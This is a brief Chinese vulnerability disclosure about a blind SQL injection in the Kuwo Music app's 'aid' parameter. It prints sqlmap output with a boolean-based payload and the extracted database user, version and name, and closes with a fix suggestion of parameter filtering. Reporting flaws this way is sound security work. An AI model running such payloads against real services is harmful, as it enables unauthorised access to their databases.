酷我音乐APP一处SQL注入漏洞

　　酷我音乐APP一处SQL注入漏洞

　　*****300&type=guid&_=1478935789&*****

　　注入点：aid

　　sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:

　　---

　　Parameter: aid (GET)

　　Type: boolean-based blind

　　Title: AND boolean-based blind - WHERE or HAVING clause

　　Payload: aid=2078300) AND 2825=2825 AND (5697=5697&type=guid&_=1478935789pid=5901124&uid=21259663

　　---

　　web application technology: JSP

　　back-end DBMS: MySQL >= 5.0.2

　　current user: 'root@192.168.298.15'

　　current database: 'MLOG'

　　仅作验证，请尽快修复!

　　修复方案：

　　参数过滤